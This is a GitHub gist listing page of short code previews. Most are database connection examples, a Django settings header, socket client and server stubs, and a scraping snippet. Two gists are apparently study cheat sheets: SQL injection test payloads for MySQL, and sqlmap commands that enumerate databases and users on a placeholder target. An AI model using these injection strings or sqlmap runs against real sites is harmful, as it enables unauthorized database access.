Xifeng2009
/ Django Settings
Created
January 8, 2019 02:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Django settings for fastdev project. | |
| Generated by 'django-admin startproject' using Django 1.11.12. | |
| For more information on this file, see | |
| https://docs.djangoproject.com/en/1.11/topics/settings/ | |
| For the full list of settings and their values, see | |
| https://docs.djangoproject.com/en/1.11/ref/settings/ |
Xifeng2009
/ PyMssql
Created
January 8, 2019 02:42
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pymssql import connect # @UnresolvedImport | |
| conn = connect(host="127.0.0.1", user="DataClient", password="test", | |
| database="TimeSeries") | |
| cursor = conn.cursor() | |
| cursor.execute("exec getResearchSalesAndRepurchaseByYear %s, %d", ('F000000I1F',2011)) | |
| rows = cursor.fetchall() | |
| for row in rows: | |
| print row[0] |
Xifeng2009
/ Psycopg2
Created
January 8, 2019 02:44
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import psycopg2 | |
| conn = psycopg2.connect(database="testdb", user="postgres", password="pass123", host="127.0.0.1", port="5432") | |
| print "Opened database successfully" | |
| cur = conn.cursor() | |
| cur.execute('''CREATE TABLE COMPANY | |
| (ID INT PRIMARY KEY NOT NULL, |
Xifeng2009
/ cx_Oracle
Created
January 8, 2019 02:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import cx_Oracle #引用模块cx_Oracle | |
| conn=cx_Oracle.connect('load/123456@localhost/ora11g') #连接数据库 | |
| c=conn.cursor() #获取cursor | |
| x=c.execute('select sysdate from dual') #使用cursor进行各种操作 | |
| x.fetchone() | |
| c.close() #关闭cursor | |
| conn.close() #关闭连接 |
Xifeng2009
/ MySQL
Created
January 8, 2019 03:20
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##大写: 变量 | |
| # 查询 | |
| mysql> select * from TABLE where id=1; | |
| # 插入 | |
| mysql> insert into TABLE (姓名, 性别, 年龄) values ('张三', '男', 33); | |
| # 更新 | |
| mysql> update TABLE set title='母猪的产后护理' where id=3; | |
| # 删除 | |
| mysql> delete from TABNLE where id=1; |
Xifeng2009
/ Socket: Client
Created
January 8, 2019 03:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| #!coding: utf-8 | |
| import sys | |
| import time | |
| import socket | |
| import subprocess | |
| def main(): |
Xifeng2009
/ Socket: Server
Created
January 8, 2019 03:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import threading | |
| class Connection: | |
| def __init__(self, cid, conn, addr): | |
| self.cid = cid | |
| self.conn = conn | |
| self.addr = addr | |
Xifeng2009
/ BeautifulSoup
Created
January 8, 2019 05:20
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # 文档 | |
| https://beautifulsoup.readthedocs.io/zh_CN/v4.4.0/ | |
| import requests | |
| from bs4 import BeautifulSoup | |
| all_url = 'http://www.mzitu.com/all/' | |
| start_html = requests.get(all_url, headers=headers) | |
| Soup = BeautifulSoup(start_html.text, "lxml") # 解析器:html.parser, lxml-xml, xml, html5lib | |
| # 获取a标签的链接 |
Xifeng2009
/ SQL Injection: MySQL
Created
January 9, 2019 03:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #1 判断盲注 | |
| 1 and 1=2 | |
| 1 and 1=1 | |
| #2 整型注入 | |
| 1 or 1=1 # | |
| #3 字符型注入 | |
| 1' or 1=1 # |
Xifeng2009
/ SQLMAP: 目标&请求
Last active
January 9, 2019 06:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #1 根据url进行注入 -u | |
| sqlmap -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users | |
| # 输出详细等级 | |
| -v [1-7] | |
| -v/-vv/-vvv/-vvvv | |
| #2 直连数据库 -d | |
| sqlmap -d "mysql://admin:[email protected]:3306/testdb" -f --banner --dbs --users |